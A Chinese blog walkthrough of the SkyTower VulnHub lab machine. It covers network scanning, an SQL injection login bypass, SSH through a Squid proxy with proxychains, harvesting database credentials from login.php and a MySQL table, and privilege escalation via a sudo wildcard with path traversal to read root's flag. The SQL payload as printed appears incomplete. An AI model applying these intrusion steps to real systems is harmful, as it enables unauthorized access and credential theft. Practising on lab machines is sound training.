当前位置: 首页 > article >正文

Skytower

article 2024/9/23 5:24:01

一、安装配置靶机

下载地址:

SkyTower: 1 ~ VulnHub

下载之后解压发现是VirtualBox格式的

我们下载一个VirtualBox,这是官网

Downloads – Oracle VirtualBox

安装到默认路径就

打开后点击注册

选择解压后的vbox文件

然后点击左上角管理

点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步

就得到了一个镜像文件

用vmware打开

默认网卡模式为仅主机,更改为NAT模式

C段扫描获得IP

arp-scan -l

端口扫描一下发现22,80,3128

nmap 192.168.230.128

访问一下80端口

发现一个登录框

发现登录框,我们测sql注入

邮箱随便输入一个,密码我们输入

123' 1=1#

登录成功发现账号密码

想到远程连接22端口

发现无效

想到3128端口尝试挂上代理连接

vim /etc/proxychains4.conf

proxychains ssh john@192.168.230.128 -t "/bin/sh"

登录成功

开始提权

sudo -l

发现没有可以提权的

想到了80端口界面存在sql注入

cat /var/www/login.php

发现数据库信息

登录成功

mysql -u root SkyTech -p

查看数据库信息

show databases;

逐个查看找到

use SkyTech;
show tables;

得到账号密码

select * from login

ssh登录

proxychains ssh sara@192.168.230.128 -t "/bin/sh"

sudo -l

得到/accounts/*有权限

pwd

发现在根目录下

sudo ls /accounts/../root

查看一下

sudo cat /accounts/../root/flag.txt

得到root密码

远程连接提权成功

proxychains ssh root@192.168.230.128 -t "/bin/sh"


http://www.kler.cn/news/308537.html

相关文章:

  • 第二百三十五节 JPA教程 - JPA Lob列示例
  • k8s(kubernetes)的PV / PVC / StorageClass(理论+实践)
  • 数据库的操作:SQL运算符(算法/比较/逻辑/位)
  • 【大模型专栏—进阶篇】智能对话全总结
  • 力扣100题——动态规划(二)
  • React Native防止重复点击
  • 详解 Pandas 的透视表函数
  • PHP智能化云端培训考试系统小程序源码
  • YOLOv5 Detect.py 改变检测框box线条的粗细,隐藏检测框的检测信息,只显示检测框box
  • PHP在现代Web开发中的高效应用与最佳实践
  • Linux杂项知识
  • 深入解析:如何通过网络命名空间跟踪单个进程的网络活动(C/C++代码实现)
  • Vue3.0组合式API:setup()函数
  • SpringBoot 消息队列RabbitMQ在代码中声明 交换机 与 队列使用注解创建
  • Linux | 进程间通信:管道、消息队列、共享内存与信号量
  • 快速排序
  • 《Oracle(一)- 基础》
  • 【webpack4系列】编写可维护的webpack构建配置(四)
  • COTERRORSET—— LLM训练新基准让模型从自身错误中学习
  • 情系河北 缘聚苏州——2024苏州河北同乡迎国庆贺中秋大团圆联谊活动圆满举办
  • 学习笔记缓存篇(一)
  • HarmonyOS使用LocationButton获取地理位置
  • GBase 8s数据类型与java.sql.Types对应关系
  • 初识网络原理
  • 前端基于Rust实现的Wasm进行图片压缩的技术文档
  • 中间件常见漏洞
  • android API、SDK与android版本
  • 【Qt | QLineEdit】Qt 中使 QLineEdit 响应 鼠标单击、双击事件 的两个方法
  • php语言基本语法
  • 若依的使用